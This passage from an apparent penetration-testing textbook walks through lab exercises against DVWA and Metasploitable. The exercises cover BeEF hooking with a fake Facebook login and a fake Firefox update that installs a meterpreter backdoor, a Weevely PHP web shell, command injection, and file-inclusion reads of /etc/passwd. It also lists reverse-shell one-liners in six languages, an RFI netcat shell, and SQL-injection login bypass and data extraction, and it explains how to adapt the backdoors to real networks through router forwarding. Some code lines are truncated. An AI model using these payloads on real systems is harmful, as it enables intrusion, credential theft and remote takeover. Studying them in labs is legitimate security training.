Exercise 42: Browser Exploitation with BeEF
In this exercise we are going to use BeEF to hook and control users who
access the DVWA website ( DVWA is a website for testing vulnerabilities
that comes part of Metaspolitable virtual machine) by adding BeEF script to
as XSS stored vulnerability. The BeEF hook will allow us to perform many
tasks in the victim machine like trick the user to enter Facebook credentials
thinking that Facebook asking him to relogging plus many other commands
that we can do from BeEF hook.
In real life scenario this is send by hackers in a phishing email that contain a
link to a website that the hacker either have exploited XSS vulnerability or
the website is designed by the hacker which has BeEF hook imbedded inside
a java script in the website.
Note
If you are running Kali 2019.2 or older, BeEF comes already installed, if you
have newer version of Kali such as 2019.3 and higher including Kali 2020 ,
you will need to install BeEF manually. To check if you have BeEF installed
or not in the Kali version you have, go to Kali applications and search for
Beef, if it is not their then follow BeEF installation procedure in point 8
below.

1. In Virtual Box Start Metasplotable virtual machine

S_E_Oblako
S_E_Oblako

2. Login to Metasploitable machine as msfadmin/msfadmin

3. Check its IP address #ifconfig

4. Open Kali and then web browser and go to DVWA page in

Metasplitable VM.

5. Click on Setup then click on Create/Reset Database to clear old

setting and scripts from DVWA database.
6. Click on XSS stored
7. From Kali search for BeEF and start it and log on to beef as
beef/beef
8. BeEF Installation
a. In Kali 2020.1 BeEF does not come installed and
S_E_Oblako

you will need to install it manually, here the

procedure to install BeEF manually

b. #sudo git clone https://github.com/beefproject/beef.git

Go to beef folder #cd opt/beef

c. #sudo ./install
d. To start Beef for the first time you will get error that default
username and password in use.
e. Make sure to switch to root account #sudo su
f. Then edit the file in beef confi.yaml using mousepad text
editor ( or any file text editor) and save.

#sudo su
#mousepad config.yaml

g. Change username and password and save

S_E_Oblako

#./beef

9. If Beef installed manually, every time you want to run beef you
need to do the following:

#cd /opt/beef
#sudo ./beef
S_E_Oblako

10. Open the web browser and go to

http://127.0.0.1:3000/ui/authentication

11. Login to DVWA page at the metasploitable server

S_E_Oblako

12. Set up DVWA Security to low

13. Click on XSS Stored
14. Copy BeEF Hook URL and include it in a java script.
15. Enter the java script that include BeEF hook in the message box of
XSS stored page.

Just make sure to change the IP address to Kali IP address.

Change the length of the Message body from 50 to 500 .
Write the script inside the message body as shown below
S_E_Oblako

16. Click Sign Guestbook in the page.

17. From Windows 10 machine open web browser and go to
Metasploitable DVWA page, then click on XSS stored
S_E_Oblako

Now check BeEF window in Kali, you will see that Windows 10 IP address
is under online browser
S_E_Oblako

18. Click on the IP address of Windows 10 machine, you will get

detailed information about the machine

19. Click on Commands / Social Engineering/ Pretty Theft and choose

Facebook then click execute
S_E_Oblako

20. Look at the Windows 10 browser, you will see Facebook login
dialogue, enter and username and password
S_E_Oblako

21. Go to Kali BeEF page and see the information that entered by the
victim user.

Note
we will know more about Store Cross Site Scripting XSS vulnerability that
we used in the above exercise in the Web penetration testing section.

9.1. Using BeEF to send backdoor

S_E_Oblako

Exercise 43: Hacking Windows 10 using BeEF

If a user accesses a website that is loaded with BeEF hook, attacker will see
the information of the of the machine which it is browsing the website such
as the machine operating system and the browser type. The attacker can then
send fake update to the victim web browser. If the user chooses to allow
update, BeEf will send a reverse shell backdoor which will give the attacker
Metasploit meterpreter session from the victim machine. As we saw before in
Client attacks Meterpreter will give a full control of the victim machine.
In this exercise we are going to use Kali website and insert BeEF java code
inside it, then we are going to connect to the Website from a windows 10
machine , BeEF will send a fake update to the Windows 10 browser user to
have a meterpreter session.

1. Start Kali Virtual machine

2. Start Windows 10 virtual machine
3. From Kali Machine start Beef

#./beef
S_E_Oblako

4. Copy the Hook URL

5. Go to /var/www/html and modify the index.html file by adding the
Beef hook to the file using leafpad.

#leafpad /var/www/html/index.html

6. Add <script src=http://kali_IP:3000/hook.js></script>

S_E_Oblako

7. Save the file

8. We need to have the malware file reverse https that we used
previously in Exercise 36 to be directly under /var/www/html and
change its name to update.exe

9. Start webserver apache2 in Kali

#service apache2 start

10. In kali open browser and go to Beef Webpage

http://127.0.0.1:3000/ui/authentication and login to beef

S_E_Oblako

11. Start windows 10 machine

12. Open Firefox browser and go to kali website http://kali_ip address

13. Look at Beef page in Kali, you will notice new online machine is
listed

14. Highlight the machine to see its details

S_E_Oblako

15. In Beef Click on Commands, then Social Engineering and go to

Fake Notification Bar ( FireFox)
16. Enter the IP address of Kali and the name of the Malware file and
give Notification text

17. -Start Kali Metasploit and setup Metasploit to listen to incoming

connection from the malware file
S_E_Oblako

18. Go to Windows you will see message bar with a request to update
Firefox
19. Click on install plugin , the update.exe file will be downloaded into
the Windows 10 machine

20. Run the update.exe file

S_E_Oblako

21. look at the Metasploit connection , you will see a meterpreter

session established
S_E_Oblako

9.2. Hooking up a Mobile phone

BeEf works with Mobile phones (Android and IOS ) the same way it works
with PC because it works through the Web browser. Even you can send a
malware to the Mobile Phone ( android only ) as an APK file and somehow
convince the victim to run the APK file which will give the attacker complete
access/control over the mobile phone.
If you like to test Beef with Mobile phone either have an android emulator in
your PC , there is a virtual box machines that emulate android, or have
external server with Ubuntu or Kali OS and loaded with Beef and has website
running that contain the Beef hook. Just browse the hooked website from the
Mobile phone and you will see the phone information in the online Browsers
section in Beef.
S_E_Oblako

10.
Detecting Trojans

This is a short theoretical section about Trojans. After gaining a

good understanding of malwares and Trojans through the previous
sections of this book, I wanted the reader to know what is the
Trojans? How they differ from virus? What type of Trojans, how to
protect PC from them and how to detect a file is a Trojan before
running it in the PC.
S_E_Oblako

10. Detecting Trojans

A Trojan horse, or Trojan, is a type of malicious code or software that looks
legitimate but can take control of your computer. A Trojan is designed to
steal, damage, disrupt, or in general inflect some other harmful action on your
data or network.
A Trojan will look like a normal harmless file to trick you. It seeks to deceive
you into loading and executing the malware in your device, once installed, a
Trojan can perform the action it is designed for.
A Trojan different from a virus, a virus can replicate itself, but a Trojan
cannot.
10.1. How Trojans works
You might think you have received an email from someone you know and
click on what looks like a legitimate attachment. But you have been fooled.
The email is from a Hacker, and the file you clicked on — and downloaded
and opened — has gone on to install malware on your device.
When you execute the program, the malware can spread to other files and
damage your computer.
10.2. Trojan Types
Backdoor Trojan: This Trojan can create a “backdoor” on your computer. It
lets an attacker access your computer and control it. Your data can be
downloaded by a third party and stolen, or more malware can be uploaded to
your device.
Distributed Denial of Service (DDoS) attack Trojan: This Trojan performs
DDoS attacks. The idea is to take down a network by flooding it with traffic.
That traffic comes from your infected computer and others.
Downloader Trojan: This Trojan targets your already-infected computer. It
downloads and installs new versions of malicious programs. These can
include Trojans and adware.
Fake AV Trojan: This Trojan behaves like antivirus software but demands
money from you to detect and remove threats, whether they are real or fake.
Info stealer Trojan: As it sounds, this Trojan is after data on your infected
computer.
Mail finder Trojan: This Trojan seeks to steal the email addresses you’ve
accumulated on your device.
S_E_Oblako

Ransom Trojan: This Trojan seeks a ransom to undo damage it has done to
your computer. This can include blocking your data or impairing your
computer’s performance.
Remote Access Trojan: This Trojan can give an attacker full control over
your computer via a remote network connection. Its uses include stealing
your information or spying on you.
Rootkit Trojan: A rootkit aims to hide or obscure an object on your infected
computer. The idea is to extend the time a malicious program runs on your
device.
SMS Trojan: This type of Trojan infects your mobile device and can send
and intercept text messages. Texts to premium-rate numbers can drive up
your phone costs.
Trojan banker: This Trojan takes aim at your financial accounts. It’s
designed to steal your account information for all the things you do online.
That includes banking, credit card, and bill pay data.
Trojan IM: This Trojan target instant messaging. It steals your logins and
passwords on IM platforms.
That is just a sample. There are a lot more.
10.3. Protect against Trojans
Use up to date Anti-Virus/Anti-malware software.
Protect with complex unique password.
Be careful with email attachments. To help stay safe, scan an
email attachment first.
Do not visit unsafe websites. Some internet security software
will alert you that you are about to visit an unsafe site.
Do not open a link in an email unless you are confident it
comes from a legitimate source. In general, avoid opening
unsolicited emails from senders you do not know.
Do not click on pop-up windows that promise free programs
that perform useful tasks.
Do not ever open a link in an email unless you know exactly
what it is.

10.4. Manual Trojans detection

S_E_Oblako

If you are suspecting a file that carry Trojan, right click the file, and see
property. If the file looks like jpg or PDF and carry a Trojan the property will
show it is executable (.exe), also if you try to run the file, Windows 10 will
give you a warning that the file is executable if choose to “run anyway “the
backdoor will be installed in your machine.
If you open resource monitor in Windows 10, you can see all the processes
that uses the internet and which port it is using.

10.5. Using Sandbox

You can use sandbox to analyze the file before running it in your machine,
the sandbox is an online service that you upload the suspected file to it and
they will do complete analysis of the file. Some data in the report will be
hidden for paid version but the data that is not hidden well enough, an expert
eye can tell it is a suspicious file, the link to Sandbox is:
https://www.hybrid-analysis.com/
S_E_Oblako

11
Gaining Access in Real Networks

In all exercises we did so far we were using the virtual internment

that we created in the section 1, there is small different between
doing the previous exercises in virtual environment or in a real
environment in case you want to do a penetration testing to an
organization, this section will show what is the difference and how
to setup the different tools with real network IP addresses and how
to do forwarding from the local Wi-Fi router that the tester is using
to his machine.
S_E_Oblako

11. Gaining access in real network

All the previous attacks such as backdoors and BeEF will work in real
network the same way as in lab the only difference is that by default the
internal Wi-Fi router will not accept incoming connection or even if it accepts
the incoming connection, it does not know what to do with it as the incoming
connection will be using the public IP address.

11.1. Configuring the router

You will need to know the public IP address that you internet connection is
using in the router ad configure the router to forward the incoming request in
specific port to the Kali machine.
Exercise 44: Gaining Access in Real Networks
You need to create malware using Viel Framework as done in
Exercise 29 but you replace the Kali local IP address with Router
public IP address
Check the router public IP address by going to whatsmyip.com page

configure Viel with public IP address and generating the backdoor

S_E_Oblako

Setting the Metasploit :

The Metasploit is the program which make Kali machine listen to the
incoming connection, this should be set with the internal IP address of
the Kali machine not the Public IP address as the forwarding from
public to internal will be done in the router

Setting the Router

Now we need to set the router to forward any connection coming in port
8080 to the Kali Machine internal IP address.

Connect to Router through http using the first IP address in the

router range such as 192.168.0.1
Login to the router
Look for IP FORDWARDING in the router setting
S_E_Oblako

Add port 8080 and point to the Kali machine IP address and save

Setup another role for port 80 to allow the backdoor to be uploaded

from Kali web server to victim machine
S_E_Oblako

Setting up Beef for web browser hookup from outside

Change the IP address in the Java script to the public IP address

Setup the router IP FORWARDING to send connection coming in
port 3000 (Beef port) to the Kali machine internal IP address.
S_E_Oblako

12
Website Penetration Testing

Web penetration testing is the process of using penetration testing

techniques on a web application to detect its vulnerabilities. Web
application penetration testing works by using manual or
automated penetration tests to identify any vulnerability, security
flaws or threats in a web application. In the following sections we
will focus manual and automated Web Pen testing techniques.
S_E_Oblako

12. Website penetration testing

Web Application Penetration Testing is a process in which we use
penetration testing and security skills to find different vulnerabilities in web
applications. It plays an important role in every modern organization. If the
organization does not thoroughly test and secure its web apps, adversaries
can compromise these applications, damage business functionality, and steal
data. The web application penetration testing key outcome is to identify
security weakness across the entire web application and its components
(source code, database, back-end network). It also helps in prioritizing the
identified vulnerabilities and threats, and possible ways to mitigate them.
12.1. Website (web Applications) components
Server (hardware or virtual)

Server Operating system

Web site software such as Apache or IIS
Database such as Mysql , ..
Web application such as php, python

The first step of website penetration testing is data gathering about the
website and its IP address, domain registration information, website software
and many other information. There are many resources that can give this
information online and other tools that can reveal the website info and the
subdomains.
12.2. Website Information Gathering
Whois Lookup: http://whois.domaintools.com/
W3dt.net (free information gathering online tools)
https://pentest-tools.com/home (paid web site for info gathering
tools)
S_E_Oblako

The Data that you need to collect about website to start penetration
testing is:

IP address
Domain Name info
Technologies used
Other websites on the same server
DNS records
Unlisted files, sub-domains, directories

Exercise 45: Web Site Information gathering

Netcraft site report ( https://toolbar.netcraft.com/site_report )
Netcraft site report is a very useful website that can run a detailed report
about any websites and give you all the information in one location, that is
including all the technologies used in the website and if there is any
vulnerability or trackers used by the website, you can use the data gathered
from the website and cross reference it with exploit Database
(https://www.exploit-db.com/) to see if there are any exploits that can be used
to hack in the website
DNS Information:
We can get a comprehensive DNS information using Robtex DNS lookup.
Robtex is a website that you enter the name of the Site, then Robtex will give
back detailed information about the site. the link to Robtex is:
https://www.robtex.com
S_E_Oblako

12.3. Discovering websites in the same Server

One server can host many website, gaining access to one website may help
gaining access to other websites in the same server, so if you could not find
any other vulnerability in the target website but there are other websites in the
same server. Gaining access to these websites that have vulnerabilities can
lead to gain access to the server itself and then the target website.
You can use Robtex report to see other websites that sharing the same IP
address.
12.4. Subdomains
Subdomains are sites that uses the same domain name, but they are different
in the first phrase for example goole.com have subdomain mail.google.com
that takes you directly to google mail page. Discovering subdomains is
important because some companies have subdomains that are not advertised
and used either internally by employees or used for special customers to give
them access to special services. These subdomains are not seen in search
engines because there are no links leading to them. Because of the hidden
nature of some subdomain they might be not as secured as the public website
and they might contain some vulnerabilities, also many websites have a
subdomain for testing, when they install new update or a big change to the
website they install it in the subdomain for testing before installing the update
in the main website.
Exercise 46: Discovering Subdomains with Knock Tool
Knock is a kali tool that can search any Domain name and find subdomains,
first download the tool, and run it in Kali as the flowing procedure:
S_E_Oblako

1. Login to Kali and open terminal windows

#git clone https://github.com/guelfoweb/knock.git

2. Find where the file download and running the python script

#python knockpy.py <website>

3. The file will take some time running as it try all possible
subdomains then it gives you the results

12.5. Finding Files and Directories

Website are consisting from directory and files, when you access any page in
S_E_Oblako

the website, you are accessing a file inside a directory for example when you
access page http://10.0.2.5/multillidae/ , in fact you are accessing a folder
called mutillidae inside the website 10.0.2.5 then access a file inside that
folder that give you the page you are browsing
Exercise 47: Finding Files and Directories
1. Open Metasploitable VM from Virtual Box.
2. Login as msfadmin/msfadmin
3. Make sure folder mutillidae exist

4. Check the IP address of Metasploitable machine

5. From Kali open web page to the mutillidae

6. Using dirb tool to find files and folders

#dirb is a tool that come by default as part of Kali and it can search any
website for directories and files using word list attack , to see how drib used
open terminal in Kali and type:
#man dirb
Since dirb uses a brute force attack, it uses a word list to start the attack there
is a default word list that can be used or you can create your own word list
using tool called crunch.
7. Use drip to discover files and folders in the mutillidae website
# dirb http://10.0.2.5/mutillidae -o output.txt
S_E_Oblako
S_E_Oblako

Analyzing the files discovered:

The files discovered is pages that we can access them through web browser
because they are listed under the www directory and they may provide a
valuable information, these files can be accessed from the web browser
following the link as is shown in the screenshot below
- For example we can access : http://10.0.2.5/mutillidae/bhbinfo

- This file shows the PHP design information

- Another example if we check the robots file
S_E_Oblako

- The robots.txt file inform google and other search engine not to list the
files that it in the list above.
- If we check the passwords file in the web browser:

- If we click on the accounts.txt file, we will get the following:

12.6. File uploads, code execution and file exclusion

There are some website allow users to upload files to the website such as
S_E_Oblako

advertisement websites that allow users to upload images If the website is

not secure that may allow users to upload other types of files to the website
that compromise the website and allow adversaries to take control of the
website. In the following exercise we are going to control vulnerable website
by uploading PHP file that will give u a php shell and allow us to control the
website
Exercise 48: File Upload
In this exercise we are going to use the Metasploitable Virtual machine
website, to see how we can use file upload vulnerability on the website to
upload PHP code that will give us full control of the website Server.

1. From Kali open web browser and enter the Metasploitable IP

address then click on DVWA and Login.
2. Login used:

Admin / password

3. Setup DVWA security to low:

S_E_Oblako

4. Click on upload
S_E_Oblako

5. The web site allow us to upload files using the upload button ( in
real life scenarios websites such as classified websites allow you to
upload images and other files)
6. The website is expecting us to upload an image, first we will upload
an image as the site expecting, then will upload a PHP file.
7. Uploading image file to the website: Browse to the Image and select
it then click upload
S_E_Oblako

8. As you can see the picture was uploaded to the link shown
../../hackable/uploads/index.jpg

9. To see the picture uploaded, in Kali Browser, insert the picture link
as shown in below screenshot
S_E_Oblako

Uploading PHP file:

Weevely : Weevely is a stealth PHP web shell that simulate telnet-like
connection. It is an essential tool for web application post exploitation and
can be used as stealth backdoor or as a web shell to manage legit web
accounts, even free hosted ones.

10. We are going to use Weevely tool to create a payload in a php file
and upload it to the website
11. To create php shell file go to Kali terminal and type the following
commands:

#weevely generate 12345 /root/shell.php

(12345 is a password that we protect our file so when it uploaded to the
website only we can use it.
S_E_Oblako

12. The file is generated and stored in Kali under /root

13. Make sure DVWA website Security is set to low

14. Go to the website and upload the shell.php file

S_E_Oblako

15. Use Kali to connect to the file shell.php which we uploaded to the
site

#weevely < web link to the file > password

16. From Weevely> we can run any Linux command in the target
machine

17. To see what other options that Weevely can do just type help
S_E_Oblako

Remote Code Execution:

Remote code execution is the ability to execute a code inside the website and
run OS commands and interacting with the website host operating system.
For example, if the website offers a service that allow the user to verify
connectivity using ping command, that is mean the website allow end users to
interact with the Website operating system. If the website does not sanitize
the input and only pass “ping command” there is a high possibility the user
can pass other commands to the OS that might lead to pulling sensitive
information from the system.
Remote Code Evaluation which is a vulnerability can be exploited if a user
S_E_Oblako

input is injected into a File or a String and executed (evaluated) by the

programming language's parser. Usually this behavior is not intended by the
developer of the web application. A Remote Code Evaluation can lead to a
full compromise of the vulnerable web application and web server. It is
important to note that almost every programming language has code
evaluation functions.
Exercise 49: Remote Code Execution
In the following example we are going to use the Metasploitable virtual
machine web site to exercise remote code execution.

1. Open Web page from Kali Linux to Metasploitable DVWA web

page and click on Command execution.
2. Enter Kali IP address and click ping.

3. In Linux OS we can combined many command in one line using the

sign (;) so we can send ping command followed by the sign; then
any command we choose for example I can send the Kali IP address
followed by command pwb
S_E_Oblako

4. We can use this vulnerability to create a reverse connection that will

give us access to the website OS same way as the shell.php

5. Make kali Linux listen to outside connections

S_E_Oblako

6. Open the webpage to command execution and inter in the Ping field
the following

10.0.2.15; nc –e /bin/sh 10.0.2.15 8080

7. Go back to kali terminal and see the connection established.

8. Now you can run Linux commands inside the Metasploitable
machine.

Notes
users accessing the vulnerable machine using code execution does
not have a root permission and it is limited to the allowed tasks and
commands that a web user can do.
S_E_Oblako

Depending on the website technology, you might need to change the

reverse connection instructions, below is reverse connection
instructions in different programing languages.

You choose the language based on the website, for example if the
website uses PHP, choose PHP instruction below to make the
reverse connection
The IP address of the attack server and the port used, should be
included on the instruction
Kali reverse connection listener should be setup using

#ns -vv -l -p <port number>

Reverse connection code in different languages

BASH
bash -i >& /dev/tcp/10.0.2.15/8080 0>&1
PERL
perl -e 'use
Socket;$i="10.0.2.15";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobynam
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh
-i");};'
Python
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.c
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.2.15",8080);exec("/bin/sh -i <&3 >&3
2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.2.15",8080).to_i;exec
sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh 10.0.2.15 8080
S_E_Oblako

Local files inclusion variabilities (LFI)

File inclusions are part of every advanced server-side scripting language on
the web. They are needed to keep web applications code tidy and
maintainable. They also allow web applications to read files from the file
system, provide download functionality, parse configuration files, and do
other similar tasks. If it is not implemented properly, attackers can exploit
them and craft a LFI attack which may lead to information disclosure, cross-
site-Scripting (XSS) and remote code execution (RFI) vulnerabilities.
How to Test
Since LFI occurs when paths passed to "include" statements are not properly
sanitized, in a black box testing approach, we should look for scripts which
take filenames as parameters.
Consider the following example:
http://vulnerable_host/preview.php?file=example.html
This looks like a perfect place to try for LFI. If an attacker is lucky enough,
and instead of selecting the appropriate page from the array by its name, the
script directly includes the input parameter, it is possible to include arbitrary
files on the server.
Typical proof-of-concept would be to load passwd file:
http://vulnerable_host/preview.php?file=../../../../etc/passwd
Exercise 50: File Inclusion
1. In Kali open webpage of Metasploitable machine DVWA page

2. Click on File exclusion

S_E_Oblako

In
the web page address bar and after the word page= inter any name to reveal
the path

3. This give us an error as shown above, from the error we can see the
location of the file which is
/var/www/dvwa/vulnerabilities/fi/include.php
4. The current location at the operating system is under
S_E_Oblako

/var/www/vulnerabilities/fi/
5. if we want to read another file in other directory for example we
need to read /etc/passwd file which contain all users of this machine
we have to go back 5 locations as follow:

6. If we want to see the /ect/passwd file then we should write in the

URL the following? page=../../../../../etc/passwd
7. Here I am asking the Linux terminal to return back 5 spaces to
return to root position so I can read the file /etc/passwd, it is like
someone type cd.. 5 times.

8. Through this website vulnerability we were successful to know all

the users of the machine from the etc/passwd file, same way we can
access any other file.

Remote file inclusion vulnerability

Remote file inclusion vulnerability is the same as local file vulnerability but
the difference is in the address bar we put the IP address of another server
S_E_Oblako

and path to a file that the website will execute, this will allow us open a
backdoor in the website itself. To do this there is parameter in the PHP
configuration file (Allow URL fopen) if this set to On then remote file
inclusion can be done.

Exercise 51: Remote File inclusion

1. To check the function of PHP setting, go to Metasploitable machine
and type the command

#sudo nano /etc/php5/cgi/php.ini

2. Enter root password ( msfadmin)

S_E_Oblako

3. Hit Control W to start search inside nano for (allow_url)

4. Change the second parameter ( allow_url-include=off to on )

5. Control X Then Save and exit
6. In kali machine, create the remote file that will include reverse
connection in the Kali machine, so open leafpad and inter the
S_E_Oblako

following php code

<?php
Passthru(“nc -e /bin/sh kali Ip address port”);
?>

- passthru (“ “) ; enable you to execute any command between the

prickets .
- Save the file in Kali under /var/www/html as .txt file
- In Kali machine listen to external connection using command
#nc –vv –l –p 8080
- Make sure that apache2 service is running in the Kali machine and
you can access the file through browser inside kali

7. I created a webpage in my kali machine called rmotefile.txt, this

webpage includes php script.
8. When it is accessed, it will start reverse connection back to Kali
machine
9. From Kali web browser go to the Metasploitable DVWA page, then
click on file exclusion and add the link to the file in the page as in
S_E_Oblako

the screenshot below

10. See the kali terminal to make sure the connection established
11. Enter commands
12. uname -a
13. pwd
14. ls
S_E_Oblako

12.7. Preventing above vulnerabilities

Uploading files:
If the website functionality need to have users upload files, then a check
should be implemented in the website code for the file type allowing only
expected file type to be uploaded, for example if the website expecting users
to upload jpg pictures then the website should allow only jpg files to be
uploaded and should prevent any other types from being uploaded.
Code Execution:
Code execution should be prevented, and the page should not accept any kind
of code, if the page must have such a function then make sure that:

Sanitize user input; not easy due to the big number of possible
bypasses of restrictions.
Do not let users decide the extension or content of files on the web
server and use safe practices for secure file uploads.
Do not Pass any user-controlled input inside evaluation functions or
callbacks.
Try to blacklist special characters or function names. Exactly as
sanitizing this is almost impossible to safely implement.

File Inclusion:
The file inclusion should be disabled in the php.ini file for both features
allow_url_fopen = off
allow_url_include = off
The other way to prevent file inclusion is to use static page inclusion not
dynamic page inclusion in the php web design.
Web Application Firewall (WAF)
A WAF or Web Application Firewall helps protect web applications by
filtering and monitoring HTTP traffic between a web application and the
Internet. It typically protects web applications from attacks such as cross-site
forgery, cross-site-scripting (XSS), file inclusion, and SQL injection, among
others. A WAF is a protocol layer 7 defense (in the OSI model) and is not
designed to defend against all types of attacks. This method of attack
mitigation is usually part of a suite of tools which together create a holistic
defense against a range of attack vectors.
S_E_Oblako

13
SQL Injection

SQL injection is one of the most common web hacking techniques.

SQL injection is the placement of malicious code in SQL
statements, via web page input. If the website has a database and
expect users to login for example and having fields for username
and password, the hackers may use these fields to enter SQL
statements that may lead to bypass the authentication and give
direct access to the database.
In this section we are going to do manual and automated SQL
injections, and list the recommendations to protect websites against
SQL injection.
S_E_Oblako

13. SQL injection

Most Websites use Database to store data such as files, pictures, audio, and
video and more. The web application uses the database to stores and retrieve
web contents. Website applications uses SQL language to interact with the
database.
SQL injection vulnerability give the attacker an access to the database where
he can read all database files that include accounts and passwords which
allow him to access the systems using legitimate account and therefore
extremely hard to discover. SQL injection is more powerful than PHP scripts
and file inclusion techniques because it gives direct access to the database
and no need to access the operating system
Exercise 52: Logging to Database
This exercise is to introduce database and some SQL commands to those who
are not familiar with databases we going to access database that is used by
web application and show some database tables and their contents
1. Start Metasploitable machine
2. Open Kali machine terminal window
3. To access database you need the database user in this exercise
database user is root
#mysql –u root –h 10.0.2.5 (IP address of Metasploitable machine to access
the)
4. When you get MySQL> prompts that means that you are now inside
the database and you can run SQL commands to show database
tables and do database queries
Mysql> show databases; (do not forget the “; “at the end of the sql
command)
S_E_Oblako

5. Exploring databases

MySQL > use owasp10;

MySQL [owasp10]> show tables;
S_E_Oblako

6. Looking inside the tables

S_E_Oblako

>select * from accounts ;

7. The DBA designs the databases and create the tables. The web
application inserts the data inside the table based on end user
interaction.

13.1. Discovering SQL injection

Every web application that accept input from users uses a database to store
and retrieve user’s data, also Website information gathering tools will show if
the website uses a database and show the database type and version. There
are many tools that can find SQL vulnerabilities in a website and we are
going to use some of them in this section but for manual SQL vulnerability
discovery Penetration testers usually enumerate the set of parameters that
each page takes try putting special characters like quotes into them. If
entering O'Reilly in a form input causes an exception, then there is a good
chance ' OR '' == ' will cause a whole bunch more results to come out than
the programmer intended.
S_E_Oblako

Configuring the Metasploitable website:

Fixing lab issue
In older versions of Metasploitable machine version there is configuration
error in the database, the following procedure is just to make sure the
database that we are going to use for testing is configured right

1. Open shell in Metasploitable machine and type

2. Login using msfadmin/msfadmin

3. #sudo Mysql
4. Mysql>show databases;

5. Type Control +c
6. Type:

#sudo nano /var/www/mutillidae/config.inc

S_E_Oblako

7. Check line 4 $dbname = ‘owasp10’; if it is metasploit then

change it to owasp10
8. Hit Control X Then Y to save and enter

Exercise 53: Breaking a webpage

1. From Kali Machine login to webpage at the Metasploitable virtual
machine

2. Click on Mutillidae
S_E_Oblako

3. Click on Login/register and register a new user

4. Create account user and password is password
S_E_Oblako

5. Login with the user just created

S_E_Oblako

6. Logout
7. Login again as follow:

Username = test <or the user you created>

Password= just put the character ‘

8. Logon will fail but the system will through SQL error

Error Analysis

9. It is a database error that contain the location of the file and the
database statement that failed (Select * FROM accounts WHERE
username=’test’ AND password=’’’
10. Which mean the database is vulnerable to SQL injection.

13.2. Injecting a code in webpage

Exercise 54: Injecting Code into Webpage
1. Go back to login page and enter the username (user)

2. Enter the user password followed by statement AND space 1=1#

(password’ AND 1=1#) and hit enter.
S_E_Oblako

3. If the page login without error that’s mean the page accepted the
injected code 1=1

4. Login will be successful because we provide the password and true

SQL statement which AND 1=1#, this means the filed accept any
SQL statement.
5. To prove, Logout and log back again but replace 1=1 with 1=2 and
the page should give an error and Login will fail because of the
AND statement is not true.
S_E_Oblako

6. Even though we give the right username and password, the page
gave us error because the added SQL statement AND is followed by
1=2 which is not true.
7. This confirms the website is actually injecting anything in the
Password field, which mean that we can use the password field to
inject complete SQL statement and the website will execute it, if it
is in the right SQL format.

Exercise 55: Login as Admin without a password

In this exercise we are going to use SQL injection to allow us to login to the
webpage as an Admin without knowing the Admin password, instead we are
going to use OR statement in the password filled.

1. Open the Mutillidae page

2. Click on Login/Register
3. In the username field enter admin
4. In the password field enter aaa’ OR 1=1# and enter
S_E_Oblako

5. The system here tries to run the following SQL statement

6. The first part is Not True because the Admin password we entered
is not right, because we used OR statement and the second part is
True (1=1) the system allow us to continue to the Admin page.

Injecting using the Username Field:

S_E_Oblako

7. The statement that the webpage tries to run for username and
password is as following

8. we were injecting using the password field, in this exercise we will

try to use the username field to inject a SQL code

9. Here we enter admin followed by the one quotation and the #

sign, this sign telling the code to ignore anything behind it
including the password. The system will allow us to login even
though no password entered.
S_E_Oblako
S_E_Oblako

13.3. Discovering SQL injection in GET

What is the difference between HTTP GET and HTTP POST?
HTTP POST requests supply additional data from the client (browser) to the
server in the message body. In contrast, GET requests include all required
data in the URL. Forms in HTML can use either method by specifying
method="POST" or method="GET" (default) in the <form> element. The
method specified determines how form data is submitted to the server. When
the method is GET, all form data is encoded into the URL, appended to the
action URL as query string parameters. With POST, form data appears within
the message body of the HTTP request.
In the previous method we were using POST method to do SQL injections
using the field of username and password to POST the injection, in this
exercise we are going to use GET method which uses the URL bar to do the
injection.
Exercise 56: Discovering SQL injection vulnerability with GET
1. From Kali Linux open web browser and enter the IP address of
Metasploitable virtual machine then go to Mutillidae page.

2. Login as user and go to page:

3. OWASP Top 10
S_E_Oblako

4. A1 Injection
5. SQLi - Extract Data
6. User Info

7. Copy the URL Link

8. Open leafpad text editor and paste the URL as shown above
9. Insert statement (order by 1) to tell the database to list data from
coulomb 1 to prove that we can inject in the URL
S_E_Oblako

10. The order by statement is inserted after the username ( ‘ order by 1

%23 )
11. The %23 is the html character equivalent to # character
12. Note that when we insert the line in URL we have to change spaces
and signs to HTML code. Below a table for character conversion
from sign to HTML where space=%20

13. Copy the modified URL to the URL field and hit Enter

14. You will login to the page normally and have the results as
S_E_Oblako

expected
15. If you replace order by 1 to order by 10 you going to see an error
from the database because the is no column number 10.

16. That proof that the page is vulnerable to SQL injection as it

interacts with the commands we inter in the URL.

13.4. Reading Database Information:

To read database information we need to guess how many columns is the
database, in the previous example we told order by 10 which gave us error,
we are going to try order by statement until it stop giving the error
Exercise 57: Reading and Extracting Data from Website
Continue from Exercise 56 step 16
S_E_Oblako

17. Order by 6 is still giving error, which means the Database number
of Columns is below 6
18. Keep trying until the error goes away
19. So now we know the Database number of columns 5 we are going
to insert new SQL code to list all the Columns
20. Insert ‘union select 1,2,3,4,5 (union select is a SQL command that
will allow us to to have more than one select in the same command.
The command will list for us the columns as seen below column 2
is called user name , column 3 is password , column 4 is signature
S_E_Oblako

21. The result shown in the screenshot

22. We can replace with union select 1, database (), user (), version (),
5# to list the database name and database user and version

23. See the database name is owasp10 and the database user is root,
S_E_Oblako

which mean that the web application is connected to database as

root and therefore we can pass any SQL command as root, in fact
the main objective of this exercise is to prove that we can get
results from the database by injecting a SQL commands in the
URL.
24. To read more data from the database we are going to read the tables
in the database from the information_schima in the Mysql Database

25. By executing these commands we got all the tables in all databases
26. If we want to look at the tables of specific database such as
owasp10
27. Insert the following statement

Extracting sensitive data:

28. If we need to read data from a table, we must know the columns
names first.
29. The following injection will show the columns names
S_E_Oblako

30. To read the usernames and passwords from accounts table

31. We got all usernames and accounts in the accounts table

13.5. Read/write files using SQL vulnerability

In this exercise we are going to use SQL injection to read any file in the web
server, even files outside the www folder because the SQL database user is
root , also we are going to upload files to the website.
Exercise 58: Reading and writing files using SQL vulnerability
1. To read a file inside the web server , I am going to insert the
following statement in the URL
S_E_Oblako

union select, load_file(‘/etc/passwd’),null,null,null%23

